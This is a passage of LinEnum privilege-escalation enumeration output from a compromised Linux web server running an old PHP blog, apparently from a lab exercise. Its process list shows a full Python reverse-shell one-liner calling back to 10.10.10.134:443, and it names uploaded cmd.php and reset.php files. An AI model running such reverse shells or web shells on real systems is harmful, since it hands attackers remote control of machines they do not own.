-rw-r--r--  1 root root  102 Jan  5  2011 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 May  7  2011 .
drwxr-xr-x 84 root root 4096 Dec 22 16:56 ..
-rw-r--r--  1 root root  102 Jan  5  2011 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 May  7  2011 .
drwxr-xr-x 84 root root 4096 Dec 22 16:56 ..
-rw-r--r--  1 root root  102 Jan  5  2011 .placeholder
-rwxr-xr-x  1 root root  730 Apr 18  2011 apt-xapian-index
-rwxr-xr-x  1 root root  895 Feb 22  2011 man-db


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:0c:29:e5:c4:ee  
          inet addr:10.10.10.100  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fee5:c4ee/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1153 errors:0 dropped:0 overruns:0 frame:0
          TX packets:853 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:154485 (154.4 KB)  TX bytes:147501 (147.5 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


[-] ARP history:
10.10.10.134 dev eth0 lladdr 00:0c:29:73:7d:da REACHABLE


[-] Nameserver(s):
nameserver 10.10.10.15


[-] Default route:
default via 10.10.10.15 dev eth0  metric 100 


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4  23952  2032 ?        Ss   08:41   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    08:41   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    08:41   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S    08:41   0:00 [kworker/u:0]
root         6  0.0  0.0      0     0 ?        S    08:41   0:00 [migration/0]
root         7  0.0  0.0      0     0 ?        S<   08:41   0:00 [cpuset]
root         8  0.0  0.0      0     0 ?        S<   08:41   0:00 [khelper]
root         9  0.0  0.0      0     0 ?        S<   08:41   0:00 [netns]
root        10  0.0  0.0      0     0 ?        S    08:41   0:00 [sync_supers]
root        11  0.0  0.0      0     0 ?        S    08:41   0:00 [bdi-default]
root        12  0.0  0.0      0     0 ?        S<   08:41   0:00 [kintegrityd]
root        13  0.0  0.0      0     0 ?        S<   08:41   0:00 [kblockd]
root        14  0.0  0.0      0     0 ?        S<   08:41   0:00 [kacpid]
root        15  0.0  0.0      0     0 ?        S<   08:41   0:00 [kacpi_notify]
root        16  0.0  0.0      0     0 ?        S<   08:41   0:00 [kacpi_hotplug]
root        17  0.0  0.0      0     0 ?        S<   08:41   0:00 [ata_sff]
root        18  0.0  0.0      0     0 ?        S    08:41   0:00 [khubd]
root        19  0.0  0.0      0     0 ?        S<   08:41   0:00 [md]
root        22  0.0  0.0      0     0 ?        S    08:41   0:00 [kworker/0:1]
root        23  0.0  0.0      0     0 ?        S    08:41   0:00 [khungtaskd]
root        24  0.0  0.0      0     0 ?        S    08:41   0:00 [kswapd0]
root        25  0.0  0.0      0     0 ?        SN   08:41   0:00 [ksmd]
root        26  0.0  0.0      0     0 ?        S    08:41   0:00 [fsnotify_mark]
root        27  0.0  0.0      0     0 ?        S<   08:41   0:00 [aio]
root        28  0.0  0.0      0     0 ?        S    08:41   0:00 [ecryptfs-kthrea]
root        29  0.0  0.0      0     0 ?        S<   08:41   0:00 [crypto]
root        33  0.0  0.0      0     0 ?        S<   08:41   0:00 [kthrotld]
root        34  0.0  0.0      0     0 ?        S    08:41   0:00 [scsi_eh_0]
root        35  0.0  0.0      0     0 ?        S    08:41   0:00 [scsi_eh_1]
root        36  0.0  0.0      0     0 ?        S<   08:41   0:00 [kmpathd]
root        37  0.0  0.0      0     0 ?        S    08:41   0:00 [kworker/u:2]
root        39  0.0  0.0      0     0 ?        S<   08:41   0:00 [kmpath_handlerd]
root        40  0.0  0.0      0     0 ?        S<   08:41   0:00 [kondemand]
root        41  0.0  0.0      0     0 ?        S<   08:41   0:00 [kconservative]
root        43  0.0  0.0      0     0 ?        S    08:41   0:00 [kworker/0:2]
root       135  0.0  0.0      0     0 ?        S<   08:41   0:00 [mpt_poll_0]
root       181  0.0  0.0      0     0 ?        S<   08:41   0:00 [mpt/0]
root       182  0.0  0.0      0     0 ?        S    08:41   0:00 [scsi_eh_2]
root       195  0.0  0.0      0     0 ?        S<   08:41   0:00 [kdmflush]
root       204  0.0  0.0      0     0 ?        S<   08:41   0:00 [kdmflush]
root       218  0.0  0.0      0     0 ?        S    08:41   0:00 [jbd2/dm-0-8]
root       219  0.0  0.0      0     0 ?        S<   08:41   0:00 [ext4-dio-unwrit]
root       270  0.0  0.1  17052   640 ?        S    08:41   0:00 upstart-udev-bridge --daemon
root       272  0.0  0.1  21436   996 ?        S<s  08:41   0:00 udevd --daemon
root       368  0.0  0.1  21540   912 ?        S<   08:41   0:00 udevd --daemon
root       369  0.0  0.1  21540   908 ?        S<   08:41   0:00 udevd --daemon
syslog     414  0.0  0.2  54456  1436 ?        Sl   08:41   0:00 rsyslogd -c4
root       429  0.0  0.0      0     0 ?        S<   08:41   0:00 [kpsmoused]
root       500  0.0  0.0  15004   396 ?        S    08:41   0:00 upstart-socket-bridge --daemon
root       526  0.0  0.0      0     0 ?        S<   08:41   0:00 [vmmemctl]
root       566  0.0  0.5  49464  2736 ?        Ss   08:41   0:00 /usr/sbin/sshd -D
root       586  0.0  0.1   6196   656 tty4     Ss+  08:41   0:00 /sbin/getty -8 38400 tty4
root       591  0.0  0.1   6196   660 tty5     Ss+  08:41   0:00 /sbin/getty -8 38400 tty5
root       596  0.0  0.1   6196   656 tty2     Ss+  08:41   0:00 /sbin/getty -8 38400 tty2
root       599  0.0  0.1   6196   660 tty3     Ss+  08:41   0:00 /sbin/getty -8 38400 tty3
root       607  0.0  0.1   6196   660 tty6     Ss+  08:41   0:00 /sbin/getty -8 38400 tty6
root       623  0.0  0.1  18928   996 ?        Ss   08:41   0:00 cron
daemon     624  0.0  0.0  16728   376 ?        Ss   08:41   0:00 atd
root       639  0.0  4.7 170128 23980 ?        Ssl  08:41   0:00 /usr/sbin/mysqld
root       701  0.0  1.6 127524  8296 ?        Ss   08:41   0:00 /usr/sbin/apache2 -k start
www-data   748  0.0  1.9 131968  9584 ?        S    08:41   0:00 /usr/sbin/apache2 -k start
www-data   749  0.0  2.0 132116 10512 ?        S    08:41   0:00 /usr/sbin/apache2 -k start
www-data   750  0.0  1.9 132092  9844 ?        S    08:41   0:00 /usr/sbin/apache2 -k start
www-data   751  0.0  1.5 129992  7560 ?        S    08:41   0:00 /usr/sbin/apache2 -k start
www-data   752  0.0  2.0 132104 10312 ?        S    08:41   0:00 /usr/sbin/apache2 -k start
root       754  0.0  0.1   6196   660 tty1     Ss+  08:41   0:00 /sbin/getty -8 38400 tty1
root       826  0.0  0.0      0     0 ?        S    08:41   0:00 [flush-251:0]
www-data   828  0.0  1.9 132120  9960 ?        S    08:56   0:00 /usr/sbin/apache2 -k start
www-data   829  0.0  1.3 128120  6836 ?        S    08:56   0:00 /usr/sbin/apache2 -k start
www-data   830  0.0  1.9 132108  9896 ?        S    08:56   0:00 /usr/sbin/apache2 -k start
www-data   862  0.0  0.1   4220   588 ?        S    09:12   0:00 sh -c export RHOST="10.10.10.134";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
www-data   863  0.0  1.1  36868  5788 ?        S    09:12   0:00 python -c import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")
www-data   864  0.0  0.4  18000  2016 pts/0    Ss   09:12   0:00 /bin/bash
www-data   892  0.0  0.3   9924  1916 pts/0    S+   09:19   0:00 /bin/bash ./LinEnum.sh -t
www-data   893  0.0  0.3  10040  1588 pts/0    S+   09:19   0:00 /bin/bash ./LinEnum.sh -t
www-data   894  0.0  0.0   4132   324 pts/0    S+   09:19   0:00 tee -a
www-data  1304  0.0  0.2  10040  1292 pts/0    S+   09:19   0:00 /bin/bash ./LinEnum.sh -t
www-data  1305  0.0  0.2  15104  1128 pts/0    R+   09:19   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root   954896 Mar 31  2011 /bin/bash
-rwxr-xr-x 2 root root    23576 Mar 21  2011 /sbin/getty
-rwxr-xr-x 1 root root   146424 Apr 20  2011 /sbin/init
lrwxrwxrwx 1 root root       34 May  7  2011 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 10131016 Feb  3  2011 /usr/sbin/mysqld
-rwxr-xr-x 1 root root   508760 Apr  2  2011 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 156
drwxr-xr-x  2 root root 4096 May  7  2011 .
drwxr-xr-x 84 root root 4096 Dec 22 16:56 ..
-rw-r--r--  1 root root   24 May  7  2011 .depend.boot
-rw-r--r--  1 root root   24 May  7  2011 .depend.start
-rw-r--r--  1 root root   10 May  7  2011 .depend.stop
-rw-r--r--  1 root root    0 May  7  2011 .legacy-bootordering
-rw-r--r--  1 root root 1510 Sep  7  2009 README
-rwxr-xr-x  1 root root 7476 Feb 22  2011 apache2
-rwxr-xr-x  1 root root 4111 Apr 18  2011 apparmor
lrwxrwxrwx  1 root root   21 May  7  2011 apport -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 atd -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2341 Sep  7  2009 bootlogd
lrwxrwxrwx  1 root root   21 May  7  2011 console-setup -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 cron -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 dmesg -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1246 Nov  4  2010 dns-clean
-rwxr-xr-x  1 root root 1105 Apr 21  2011 grub-common
-rwxr-xr-x  1 root root 1329 Sep  7  2009 halt
lrwxrwxrwx  1 root root   21 May  7  2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 hwclock -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1293 Sep  7  2009 killprocs
lrwxrwxrwx  1 root root   21 May  7  2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 mysql -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 network-interface -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2686 Feb 18  2011 networking
-rwxr-xr-x  1 root root  882 Sep  7  2009 ondemand
lrwxrwxrwx  1 root root   21 May  7  2011 plymouth -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  561 Feb  4  2011 pppd-dns
lrwxrwxrwx  1 root root   21 May  7  2011 procps -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 8863 Sep  7  2009 rc
-rwxr-xr-x  1 root root  801 Sep  7  2009 rc.local
-rwxr-xr-x  1 root root  117 Sep  7  2009 rcS
-rwxr-xr-x  1 root root  639 Sep  7  2009 reboot
-rwxr-xr-x  1 root root 4399 Apr  8  2011 rsync
lrwxrwxrwx  1 root root   21 May  7  2011 rsyslog -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 screen-cleanup -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 3299 Mar 28  2011 sendsigs
lrwxrwxrwx  1 root root   21 May  7  2011 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  590 Sep  7  2009 single
-rw-r--r--  1 root root 4271 Sep  7  2009 skeleton
-rwxr-xr-x  1 root root 4194 Apr  2  2011 ssh
-rwxr-xr-x  1 root root  519 Sep  7  2009 stop-bootlogd
-rwxr-xr-x  1 root root 1095 Sep  7  2009 stop-bootlogd-single
-rwxr-xr-x  1 root root  700 Apr 13  2011 sudo
lrwxrwxrwx  1 root root   21 May  7  2011 udev -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May  7  2011 ufw -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2787 Nov  5  2009 umountfs
-rwxr-xr-x  1 root root 2245 Mar  4  2011 umountnfs.sh
-rwxr-xr-x  1 root root 2332 Mar 28  2011 umountroot
-rwxr-xr-x  1 root root 1997 Sep  7  2009 urandom


[-] /etc/init/ config file permissions:
total 220
drwxr-xr-x  2 root root 4096 May  7  2011 .
drwxr-xr-x 84 root root 4096 Dec 22 16:56 ..
-rw-r--r--  1 root root 1299 Apr 20  2011 apport.conf
-rw-r--r--  1 root root  261 Jun 27  2010 atd.conf
-rw-r--r--  1 root root  509 Dec 21  2010 console-setup.conf
-rw-r--r--  1 root root  356 Apr 20  2011 control-alt-delete.conf
-rw-r--r--  1 root root  297 Jan  5  2011 cron.conf
-rw-r--r--  1 root root  273 Jan 12  2011 dmesg.conf
-rw-r--r--  1 root root  317 Nov 17  2010 hostname.conf
-rw-r--r--  1 root root  444 Mar 21  2011 hwclock-save.conf
-rw-r--r--  1 root root  557 Mar 21  2011 hwclock.conf
-rw-r--r--  1 root root  571 Jan 27  2011 irqbalance.conf
-rw-r--r--  1 root root  367 Apr  1  2011 module-init-tools.conf
-rw-r--r--  1 root root  349 Apr 14  2011 mountall-net.conf
-rw-r--r--  1 root root  261 Apr 14  2011 mountall-reboot.conf
-rw-r--r--  1 root root 1201 Apr 14  2011 mountall-shell.conf
-rw-r--r--  1 root root  943 Apr 14  2011 mountall.conf
-rw-r--r--  1 root root  397 Apr 14  2011 mounted-debugfs.conf
-rw-r--r--  1 root root  427 Apr 14  2011 mounted-dev.conf
-rw-r--r--  1 root root  480 Apr 14  2011 mounted-proc.conf
-rw-r--r--  1 root root 1663 Apr 14  2011 mounted-tmp.conf
-rw-r--r--  1 root root  629 Apr 14  2011 mounted-varrun.conf
-rw-r--r--  1 root root  948 Feb  3  2011 mysql.conf
-rw-r--r--  1 root root 1611 Dec 13  2010 network-interface-security.conf
-rw-r--r--  1 root root  740 Dec 13  2010 network-interface.conf
-rw-r--r--  1 root root  332 Jun  3  2010 networking.conf
-rw-r--r--  1 root root  326 Mar 26  2010 plymouth-log.conf
-rw-r--r--  1 root root  899 Mar 18  2011 plymouth-splash.conf
-rw-r--r--  1 root root  792 Dec 13  2010 plymouth-stop.conf
-rw-r--r--  1 root root  367 Jan 25  2011 plymouth-upstart-bridge.conf
-rw-r--r--  1 root root 1073 Dec 13  2010 plymouth.conf
-rw-r--r--  1 root root  296 Dec 21  2010 procps.conf
-rw-r--r--  1 root root 1529 Apr 20  2011 rc-sysinit.conf
-rw-r--r--  1 root root  387 Apr 20  2011 rc.conf
-rw-r--r--  1 root root  822 Apr 20  2011 rcS.conf
-rw-r--r--  1 root root  343 Jan 12  2011 rsyslog.conf
-rw-r--r--  1 root root  683 Apr 14  2011 screen-cleanup.conf
-rw-r--r--  1 root root  230 Mar 18  2011 setvtrgb.conf
-rw-r--r--  1 root root  574 Apr  2  2011 ssh.conf
-rw-r--r--  1 root root  228 Apr 20  2011 tty1.conf
-rw-r--r--  1 root root  213 Apr 20  2011 tty2.conf
-rw-r--r--  1 root root  213 Apr 20  2011 tty3.conf
-rw-r--r--  1 root root  213 Apr 20  2011 tty4.conf
-rw-r--r--  1 root root  213 Apr 20  2011 tty5.conf
-rw-r--r--  1 root root  213 Apr 20  2011 tty6.conf
-rw-r--r--  1 root root  624 Apr  7  2011 udev-fallback-graphics.conf
-rw-r--r--  1 root root  769 Apr  7  2011 udev-finish.conf
-rw-r--r--  1 root root  316 Apr  7  2011 udev.conf
-rw-r--r--  1 root root  356 Apr  7  2011 udevmonitor.conf
-rw-r--r--  1 root root  331 Apr  7  2011 udevtrigger.conf
-rw-r--r--  1 root root  473 Mar 22  2011 ufw.conf
-rw-r--r--  1 root root  329 Apr 20  2011 upstart-socket-bridge.conf
-rw-r--r--  1 root root  331 Apr 20  2011 upstart-udev-bridge.conf
-rw-r--r--  1 root root  683 Mar 16  2011 ureadahead-other.conf
-rw-r--r--  1 root root  889 Mar 16  2011 ureadahead.conf


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.7.4p4


[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.1.54, for debian-linux-gnu (x86_64) using readline 6.2


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] www home dir contents:
/var/www/:
total 44K
drwxr-xr-x  4 root root 4.0K May  9  2011 .
drwxr-xr-x 16 root root 4.0K May  7  2011 ..
-rw-r--r--  1 root root 1.4K Mar 24  2008 activate.php
drwxrwxrwx 11 root root 4.0K May  9  2011 blog
drwxr-xr-x  2 root root 4.0K May  7  2011 includes
-rw-r--r--  1 root root  629 May  7  2011 index.php
-rw-r--r--  1 root root   23 Apr  3  2008 info.php
-rw-r--r--  1 root root 3.1K May  7  2011 login.php
-rw-r--r--  1 root root  516 Apr  2  2008 mysqli_connect.php
-rw-r--r--  1 root root 4.6K Apr  2  2008 register.php

/var/www/blog:
total 360K
drwxrwxrwx 11 root     root     4.0K May  9  2011 .
drwxr-xr-x  4 root     root     4.0K May  9  2011 ..
-rwxrwxrwx  1 root     root     5.9K Dec 28  2004 add.php
-rwxrwxrwx  1 root     root     6.1K Dec 27  2004 add_block.php
-rwxrwxrwx  1 root     root     4.6K Dec 28  2004 add_cgi.php
-rwxrwxrwx  1 root     root     5.7K Jan 18  2005 add_link.php
-rw-rw-rw-  1 root     root     4.4K Jan  2  2005 add_static.php
-rwxrwxrwx  1 root     root     1.7K Oct 18  2004 add_static_cgi.php
-rwxrwxrwx  1 root     root      403 Nov  8  2004 atom.php
-rwxrwxrwx  1 root     root      11K Jan  6  2005 categories.php
-rwxrwxrwx  1 root     root     7.4K Nov 30  2004 colors.php
-rwxrwxrwx  1 root     root     2.5K Nov 30  2004 colors_cgi.php
-rwxrwxrwx  1 root     root     2.7K Jan  4  2005 comment_add_cgi.php
-rwxrwxrwx  1 root     root     1.8K Oct 18  2004 comment_delete_cgi.php
-rwxrwxrwx  1 root     root      10K Jan  4  2005 comments.php
drwxrwxrwx  2 www-data www-data 4.0K Feb 16 09:01 config
-rwxrwxrwx  1 root     root     2.4K Nov 22  2004 contact.php
-rwxrwxrwx  1 root     root     1.6K Jan 18  2005 contact_cgi.php
drwxrwxrwx  3 www-data www-data 4.0K May  9  2011 content
-rwxrwxrwx  1 root     root     3.0K Oct 18  2004 delete.php
-rwxrwxrwx  1 root     root     3.3K Oct 18  2004 delete_static.php
drwxrwxrwx  2 root     root     4.0K Jan 18  2005 docs
-rwxrw-rw-  1 root     root     1001 Nov 28  2004 downgrade.php
drwxrwxrwx  2 root     root     4.0K Jan 18  2005 flash
-rwxrwxrwx  1 root     root     1.2K Sep 20  2004 image_list.php
drwxrwxrwx  2 www-data www-data 4.0K Feb 16 09:18 images
-rwxrwxrwx  1 root     root     4.7K Jan 18  2005 index.php
-rwxrwxrwx  1 root     root     4.1K Oct 18  2004 info.php
-rwxrwxrwx  1 root     root     2.3K Sep 20  2004 install00.php
-rwxrwxrwx  1 root     root     1.5K Sep 20  2004 install01.php
-rwxrwxrwx  1 root     root     2.6K Sep 20  2004 install02.php
-rwxrwxrwx  1 root     root     2.2K Sep 20  2004 install03.php
-rwxrwxrwx  1 root     root     1.6K Sep 20  2004 install03_cgi.php
drwxrwxrwx  3 root     root     4.0K Jan 18  2005 interface
drwxrwxrwx 19 root     root     4.0K Jan 18  2005 languages
-rwxrw-rw-  1 root     root     2.8K Jan  1  2005 languages.php
-rwxrw-rw-  1 root     root     5.2K Jan  1  2005 languages_cgi.php
-rwxrwxrwx  1 root     root     2.0K Sep 20  2004 login.php
-rwxrwxrwx  1 root     root     1.7K Jan 18  2005 login_cgi.php
-rwxrwxrwx  1 root     root     1.1K Sep 20  2004 logout.php
-rwxrwxrwx  1 root     root      23K Nov 29  2004 options.php
-rwxrwxrwx  1 root     root     2.4K Oct 18  2004 options_cgi.php
-rwxrwxrwx  1 root     root     7.7K Dec 28  2004 preview_cgi.php
-rwxrwxrwx  1 root     root     5.9K Dec 27  2004 preview_static_cgi.php
-rwxrwxrwx  1 root     root     2.3K Jan  2  2005 rate_cgi.php
-rwxrwxrwx  1 root     root      400 Nov  8  2004 rdf.php
-rwxrwxrwx  1 root     root      908 Sep 20  2004 recompress.php
-rwxrwxrwx  1 root     root      400 Nov  8  2004 rss.php
drwxrwxrwx  2 root     root     4.0K Jan 18  2005 scripts
-rwxrwxrwx  1 root     root     1.4K Sep 20  2004 search.php
-rwxrwxrwx  1 root     root     2.0K Sep 20  2004 set_login.php
-rwxrwxrwx  1 root     root     1.4K Sep 20  2004 set_login_cgi.php
-rwxrwxrwx  1 root     root      12K Nov 29  2004 setup.php
-rwxrwxrwx  1 root     root     2.9K Nov 29  2004 setup_cgi.php
-rwxrwxrwx  1 root     root     1.6K Oct 18  2004 static.php
-rw-rw-rw-  1 root     root     6.8K Jan 18  2005 stats.php
drwxrwxrwx  4 root     root     4.0K Jan 18  2005 themes
-rwxrwxrwx  1 root     root     3.4K Oct 18  2004 themes.php
-rwxrw-rw-  1 root     root     7.8K Nov 27  2004 trackback.php
-rw-rw-rw-  1 root     root     1.8K Nov 24  2004 trackback_delete_cgi.php
-rwxrw-rw-  1 root     root      922 Jan 18  2005 upgrade.php
-rw-rw-rw-  1 root     root     1.5K Jun 17  2004 upload_img.php
-rwxrwxrwx  1 root     root     1.9K Oct 18  2004 upload_img_cgi.php
-rwxrwxrwx  1 root     root     9.8K Sep 28  2004 upload_img_new.php

/var/www/blog/config:
total 12K
drwxrwxrwx  2 www-data www-data 4.0K Feb 16 09:01 .
drwxrwxrwx 11 root     root     4.0K May  9  2011 ..
-rw-r--r--  1 www-data www-data  108 May  9  2011 config.txt
-rw-r--r--  1 www-data www-data    0 Feb 16 09:01 password.txt

/var/www/blog/content:
total 12K
drwxrwxrwx  3 www-data www-data 4.0K May  9  2011 .
drwxrwxrwx 11 root     root     4.0K May  9  2011 ..
drwxrwxrwx  3 www-data www-data 4.0K May  9  2011 11

/var/www/blog/content/11:
total 12K
drwxrwxrwx 3 www-data www-data 4.0K May  9  2011 .
drwxrwxrwx 3 www-data www-data 4.0K May  9  2011 ..
drwxrwxrwx 2 www-data www-data 4.0K May  9  2011 05

/var/www/blog/content/11/05:
total 12K
drwxrwxrwx 2 www-data www-data 4.0K May  9  2011 .
drwxrwxrwx 3 www-data www-data 4.0K May  9  2011 ..
-rw-r--r-- 1 www-data www-data  234 May  9  2011 entry110509-191340.txt

/var/www/blog/docs:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 11 root root 4.0K May  9  2011 ..
-rwxrwxrwx  1 root root 4.2K Jan 18  2005 CHANGELOG.TXT
-rwxrwxrwx  1 root root 1.8K Jan 18  2005 CREDITS.TXT
-rwxrwxrwx  1 root root 1.5K Sep 20  2004 INSTALL.TXT
-rwxrwxrwx  1 root root  875 Jan 18  2005 README.TXT
-rwxrwxrwx  1 root root 4.7K Jan 18  2005 TODO.TXT
-rwxrw-rw-  1 root root  877 Nov 28  2004 TRACKBACKS.TXT
-rwxrwxrwx  1 root root  813 Jan 18  2005 UPGRADING.TXT

/var/www/blog/flash:
total 164K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 11 root root 4.0K May  9  2011 ..
-rw-rw-rw-  1 root root 142K Nov 30  2004 color_picker.fla
-rw-rw-rw-  1 root root  12K Nov 30  2004 color_picker.swf

/var/www/blog/images:
total 64K
drwxrwxrwx  2 www-data www-data 4.0K Feb 16 09:18 .
drwxrwxrwx 11 root     root     4.0K May  9  2011 ..
-rwxr-xr-x  1 www-data www-data  46K Feb 16 09:18 LinEnum.sh
-rw-r--r--  1 www-data www-data  172 Feb 16 09:01 cmd.php
-rw-r--r--  1 www-data www-data  113 Feb 16 09:01 reset.php

/var/www/blog/interface:
total 48K
drwxrwxrwx  3 root root 4.0K Jan 18  2005 .
drwxrwxrwx 11 root root 4.0K May  9  2011 ..
-rwxrwxrwx  1 root root  275 Sep 22  2004 button_atom03.png
-rwxrwxrwx  1 root root  280 Aug 23  2004 button_php.png
-rwxrwxrwx  1 root root  281 Sep 22  2004 button_rdf10.png
-rwxrwxrwx  1 root root  289 Sep 22  2004 button_rss20.png
-rwxrwxrwx  1 root root  702 Aug 23  2004 button_sphpblog.png
-rwxrwxrwx  1 root root  365 Aug 23  2004 button_txt.png
-rwxrwxrwx  1 root root 1.1K Sep 15  2004 favicon.ico
-rwxrwxrwx  1 root root 2.6K Sep 15  2004 feed.png
drwxrwxrwx  2 root root 4.0K Jan 18  2005 filebrowser
-rwxrwxrwx  1 root root 2.6K Aug 23  2004 simple_php_blog.png

/var/www/blog/interface/filebrowser:
total 20K
drwxrwxrwx 2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 3 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx 1 root root  145 Sep 20  2004 file_icon.gif
-rwxrwxrwx 1 root root   88 Sep 20  2004 folder_icon.gif
-rwxrwxrwx 1 root root   43 Sep 20  2004 spacer.gif

/var/www/blog/languages:
total 76K
drwxrwxrwx 19 root root 4.0K Jan 18  2005 .
drwxrwxrwx 11 root root 4.0K May  9  2011 ..
drwxrwxrwx  2 root root 4.0K Jan 18  2005 chinese
drwxrwxrwx  2 root root 4.0K Jan 18  2005 danish
drwxrwxrwx  2 root root 4.0K Jan 18  2005 dutch
drwxrwxrwx  2 root root 4.0K Jan 18  2005 dutch nieuw
drwxrwxrwx  2 root root 4.0K Jan 18  2005 english
drwxrwxrwx  2 root root 4.0K Jan 18  2005 french
drwxrwxrwx  2 root root 4.0K Jan 18  2005 german01
drwxrwxrwx  2 root root 4.0K Jan 18  2005 italiano
drwxrwxrwx  2 root root 4.0K Jan 18  2005 japanese
drwxrwxrwx  2 root root 4.0K Jan 18  2005 malay
drwxrwxrwx  2 root root 4.0K Jan 18  2005 portuguese
drwxrwxrwx  2 root root 4.0K Jan 18  2005 russian_koi8-ru
drwxrwxrwx  2 root root 4.0K Jan 18  2005 russian_windows-1251
drwxrwxrwx  2 root root 4.0K Jan 18  2005 spanish
drwxrwxrwx  2 root root 4.0K Jan 18  2005 tamil
drwxrwxrwx  2 root root 4.0K Jan 18  2005 turkish
drwxrwxrwx  2 root root 4.0K Jan  4  2005 zh_chinese

/var/www/blog/languages/chinese:
total 40K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    7 Jun  1  2004 id.txt
-rw-rw-rw-  1 root root  27K Jan 18  2005 strings.php

/var/www/blog/languages/danish:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    6 May 13  2004 id.txt
